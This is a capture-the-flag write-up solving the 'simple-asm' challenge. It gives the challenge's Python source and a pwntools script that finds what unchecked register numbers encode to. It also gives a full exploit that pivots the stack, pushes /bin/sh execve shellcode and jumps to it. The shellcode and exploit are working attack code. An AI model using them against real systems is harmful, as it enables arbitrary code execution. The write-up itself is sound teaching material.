CSR23 simple-asm Shellcode Challenge

Solution to the Cyber Security Rumble Finals challenge simple-asm.

The challenge is straightforward. It defines a custom set of instructions that are translated directly to x64 instructions and then executed at a fixed address, in a no-PIE binary. The translation lacks checks on the register numbers, so the instructions do more than they appear to at first sight when specific higher register numbers are used.

This is the provided challenge source code, which is also running on the remote instance:

import os
import struct
import sys


def main():
    """Read a simple-asm program from stdin, compile it and execute it.

    Input lines are collected until a line that is exactly ``END``; the
    terminator itself is not part of the program.
    """
    print("Input your code, followed by END", flush=True)

    # Keep calling input() until it returns the END sentinel
    source = list(iter(input, "END"))

    # Translate to machine code, then hand it to the in-memory ELF loader
    code = compile_asm(source)
    print("Executing code", flush=True)
    execute_shellcode(code)


def compile_asm(source):
    code = b""

    for line in source:
        # Skip empty lines and comments
        if not line:
            continue
        if line.strip().startswith("#"):
            continue

        # Split into mnemonic and operands
        instr, regs = line.split(maxsplit=1)
        regs = [parse_reg(r) for r in regs.split(",")]

        # Generate machine code
        match instr, regs:
            case "nul", [reg]:
                code += bytes([0x48, 0x31, 0xC0 | reg | (reg << 3)])
            case "inc", [reg]:
                code += bytes([0x48, 0xFF, 0xC0 | reg])
            case "add", [reg_dst, reg_src]:
                code += bytes([0x48, 0x01, 0xC0 | reg_dst | (reg_src << 3)])
            case _:
                print(f"Unknown instruction: {line}", flush=True)
                sys.exit()

    return code


def parse_reg(reg):
    """Return the integer register number of an operand such as ``r11``.

    Surrounding whitespace is ignored.  The operand must start with ``r``
    (checked with ``assert``); everything after that first character is
    converted with ``int`` and returned without any range check.
    """
    operand = reg.strip()
    assert operand[:1] == "r"
    number_text = operand[1:]
    return int(number_text)


def execute_shellcode(code):
    """Wrap ``code`` in a minimal 64-bit ELF held in a memfd and exec it.

    The image consists of one header page (ELF header plus a single
    program header) followed by ``code`` padded to a whole number of
    pages.  The current process is replaced by the new image.
    """
    # Align code to multiple of page size; the filler byte 0xCC is the
    # x86 int3 (breakpoint) opcode
    if len(code) % 0x1000:
        code += b"\xcc" * (0x1000 - (len(code) % 0x1000))

    # Build ELF file in memory
    elf = b""

    # ELF header (64 bytes). The literal decodes as: magic, 64-bit class,
    # little-endian, e_type = 2 (ET_EXEC), e_machine = 0x3e (x86-64),
    # e_entry = 0x1000000, e_phoff = 0x40, e_ehsize = 0x40,
    # e_phentsize = 0x38, e_phnum = 1, and no section headers.
    elf += b"\x7fELF\x02\x01\x01\x03\0\0\0\0\0\0\0\0\x02\0\x3e\0\x01\0\0\0\0\0\0\x01\0\0\0\0\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\0\x38\0\x01\0\0\0\0\0\0\0"

    # Program header: p_type = 1 (PT_LOAD), p_flags = 7 (read|write|exec),
    # p_offset = 0x1000, p_vaddr = p_paddr = 0x1000000
    elf += b"\x01\0\0\0\x07\0\0\0\0\x10\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\x01\0\0\0\0"
    # p_filesz and p_memsz are both the (page-aligned) code length
    elf += struct.pack("<Q", len(code)) * 2
    # p_align = 0x1000
    elf += b"\0\x10\0\0\0\0\0\0"

    # Pad to whole page so the code starts at file offset 0x1000,
    # matching p_offset above
    elf = elf.ljust(0x1000, b"\0")

    # Shellcode
    elf += code

    # Put ELF into memfd (anonymous in-memory file)
    memfd = os.memfd_create("sc")
    f = os.fdopen(memfd, mode="wb")
    f.write(elf)
    # Flush so the complete image is in the memfd before it is executed
    f.flush()

    # Execute memfd: the file descriptor is passed as the path argument,
    # argv is ["sc"] and the environment is empty
    os.execve(memfd, ["sc"], {})
    # NOTE(review): os.execve does not return on success and is documented
    # to raise OSError on failure, so this line looks unreachable - confirm
    print("execve failed!", flush=True)


# Only start reading and executing code when run as a script, not on import
if __name__ == "__main__":
    main()

To know what we are working with, this script enumerates every “simple-asm” instruction and operand combination together with the x64 instruction it is translated to:

import pwn
from itertools import permutations
from typing import Iterable, Callable, Tuple

# Select x86-64 so that pwn.disasm decodes the generated bytes as 64-bit code
pwn.context.update(arch='amd64')


def nul(reg: int) -> bytes:
    """Encode ``nul r<reg>`` with the same byte formula as the challenge.

    Raises ValueError when the computed third byte does not fit in 0..255.
    """
    third_byte = 0xC0 | reg | (reg << 3)
    return bytes((0x48, 0x31, third_byte))


def inc(reg: int) -> bytes:
    """Encode ``inc r<reg>`` with the same byte formula as the challenge.

    Raises ValueError when the computed third byte does not fit in 0..255.
    """
    third_byte = 0xC0 | reg
    return bytes((0x48, 0xFF, third_byte))


def add(reg_dst: int, reg_src: int) -> bytes:
    """Encode ``add r<reg_dst>, r<reg_src>`` exactly as the challenge does.

    The parameter order follows the challenge syntax, where the FIRST
    operand is the destination (OR-ed into the low bits) and the SECOND is
    the source (shifted left by three).  With this order the tuples printed
    by the enumeration can be typed directly as ``add rA, rB``.

    Raises ValueError when the computed third byte does not fit in 0..255.
    """
    return bytes([0x48, 0x01, 0xC0 | reg_dst | (reg_src << 3)])


# Candidate operand values to try: every integer from 0 to 255
byte = range(0x100)


def try_all(func: Callable) -> Iterable[Tuple[tuple, str]]:
    """Yield ``(operands, disassembly)`` for every decodable encoding of ``func``.

    ``func`` is one of the encoder helpers; it is called with every
    combination of operand values taken from ``byte``, one value per
    positional parameter.  Combinations whose encoding raises ValueError
    (a byte out of range) or whose disassembly contains ``(bad)`` are
    skipped.
    """
    # Imported locally so this function does not depend on the file header.
    from itertools import product

    num_params = func.__code__.co_argcount
    # product (not permutations) so that repeated operands such as (0, 0),
    # i.e. "add r0, r0", are enumerated as well.
    for operands in product(byte, repeat=num_params):
        try:
            disasm = pwn.disasm(func(*operands))
        except ValueError:
            # The operand combination does not fit into a single byte
            continue
        if '(bad)' not in disasm:
            yield operands, disasm


# Print every (operands, disassembly) pair, one mnemonic after the other
for encoder in (nul, inc, add):
    for i in try_all(encoder):
        print(i)

From the output of the script we can see that we have xor rXX, rYY, inc rXX, dec rXX, rex.W call rXX, rex.W jmp rXX, rex.W jmp rXX, rex.W push rXX and add rXX, rYY. This is a lot to work with, especially since we are running in a no-PIE binary that has rwx memory.

The plan for exploitation is the following: First, we build a primitive to write an arbitrary value into any register. This is done by setting another register, say rbx, to one with:

nul r11  # xor    rbx, rbx
inc r3   # inc    rbx (rbx = 1)

and then doubling it 64 times. At each step i we check whether the value we want to write has a 1 at bit i. If so, we add rbx, which at this point is 1 << i, to the target register.

Second, we set rsp into an executable area. Next, we push the shellcode in pieces of eight bytes, backwards, onto our pivoted stack, constructing each piece in a register with our first primitive. Last, we just need to jump to our shellcode through rsp (inc r228 is translated to 48 FF E4, i.e. jmp rsp).

We could optimize this at multiple points, e.g. by filling all registers at once, but size or execution time is not a concern in this challenge.

Here is the full exploit:

import pwn
from typing import List


# Tell pwntools that the target is x86-64
pwn.context.update(arch='amd64')


def get_shellcode() -> List[int]:
    """Return the shellcode split into unsigned little-endian 8-byte integers.

    The integers are in memory order: element 0 holds the first eight
    bytes of the shellcode.  A final piece shorter than eight bytes would
    simply yield a smaller integer.
    """
    # short shellcode
    payload = b"j;X\x99H\xbb/bin//shRST_RWT^\x0f\x05"
    word_size = 8

    # shellcode as eight byte ints
    qwords = []
    for start in range(0, len(payload), word_size):
        piece = payload[start:start + word_size]
        qwords.append(int.from_bytes(piece, 'little'))
    return qwords


def stackpivot() -> str:
    """Return simple-asm source that sets rsp to (1 << 24) + 500.

    rsp is zeroed, set to one, doubled 24 times and finally incremented
    500 times.  1 << 24 is 0x1000000, the address at which the challenge's
    ELF header maps the generated code.
    """
    doublings = 24
    increments = 500
    pieces = (
        'nul r4\n',                     # xor rsp, rsp
        'inc r4\n',                     # inc rsp       (rsp = 1)
        'add r36, r0\n' * doublings,    # add rsp, rsp  (rsp = 1 << 24)
        'inc r4\n' * increments,        # inc rsp
    )
    return ''.join(pieces)


# Collect the program as a list of lines and join once at the end.
# The stack pivot comes first so that every later push lands in the
# writable and executable code mapping.
lines = [stackpivot()]

# Push the shellcode last piece first: the stack grows downwards, so the
# first piece has to be pushed last to end up at the lowest address (rsp).
for inst in reversed(get_shellcode()):
    lines.append('nul r11\n')  # xor    rbx, rbx
    lines.append('inc r3\n')   # inc    rbx (rbx = 1)
    lines.append('nul r13\n')  # xor    rbp, rbp
    for i in range(64):
        # rbx holds 1 << i here; add it when bit i of the piece is set
        if inst & (1 << i):
            lines.append('add r29, r0\n')  # add rbp, rbx
        lines.append('add r27, r0\n')  # add rbx, rbx
    lines.append('inc r53\n')  # push rbp

# 0xC0 | 228 == 0xE4, so this is 48 FF E4: jmp rsp (not call rsp)
lines.append('inc r228\n')  # jmp rsp
lines.append('END\n')
sc = ''.join(lines)

p = pwn.process(['python3', 'simple_asm.py'])
# pwntools tubes work on bytes; encode explicitly instead of relying on
# its implicit text-to-bytes conversion (which emits a warning)
p.send(sc.encode())
p.interactive()